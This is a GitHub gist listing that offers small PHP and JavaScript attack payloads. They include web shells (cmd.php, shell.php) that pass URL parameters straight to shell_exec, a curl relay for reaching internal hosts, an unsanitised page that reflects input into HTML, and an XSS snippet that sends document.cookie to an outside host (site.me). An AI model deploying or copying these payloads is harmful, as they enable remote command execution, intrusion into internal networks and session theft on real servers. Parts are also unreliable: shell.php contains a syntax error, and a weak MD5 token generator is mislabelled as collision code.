Skip to content

Instantly share code, notes, and snippets.

View dino213dz's full-sized avatar
🤖
La tête dans les codes

Allaeddine dino213dz

🤖
La tête dans les codes
2 followers · 4 following
View GitHub Profile
@dino213dz
dino213dz / img.php
Created August 17, 2019 15:03
Payload that displays a any picture on a website with apache privilege
<HEAD><TITLE><?php echo $_GET['file'] ?></TITLE></HEAD><BODY><IMG src="<?php echo $_GET['file'] ?>" width="100%" height="100%" /></BODY>
@dino213dz
dino213dz / nav.php
Created August 17, 2019 15:07
Payload that runs curl request and shows result. Useful when need to acces to local IP from internet web interface.
<?php echo shell_exec('curl '.$_GET['options'].' '.$_GET['url'].' 2>&1'); ?>
@dino213dz
dino213dz / cmd.php
Created August 17, 2019 15:09
Payload that allows to run commands and displays them correctly on a web page
<?php
$cde=$_GET['cmd'];
$options=$_GET['options'];
$commande=$cde.' '.$options;
$console_symbol='<b>&nbsp;&gt;&nbsp;</b>';
echo '<html><head><title>'.$commande.'</title></head><body>';
echo $console_symbol.' '.$commande.' : <HR>';
$retour_cde=shell_exec(''.$commande.' 2>&1 >/tmp/cmd.log;while read ligne; do echo $ligne"</BR>"; done < /tmp/cmd.log');
$retour_cde=str_replace(' ','&nbsp;',$retour_cde);
@dino213dz
dino213dz / shell.php
Last active September 10, 2019 10:43
Simple Shell Payload
<html><head><title><?php echo $_GET['cmd'].' '$_GET['options'] ?></title></head><body>
<?php echo shell_exec($_GET['cmd'].' '.$_GET['options']); ?>
</body></html>
@dino213dz
dino213dz / xss.js
Created August 17, 2019 15:24
XSS Cookie Steal technique using javascript
document.location="http://site.me/csrf_store.php?doc_cookies="+document.cookie;
@dino213dz
dino213dz / genMd5PlusSalt.php
Created September 9, 2019 17:17
MD5 collision code: generate a token with salt using a random number
<?php
$salt = microtime();
$generated_token = MD5('$salt' . rand(1, 100));
echo $generated_token;
?>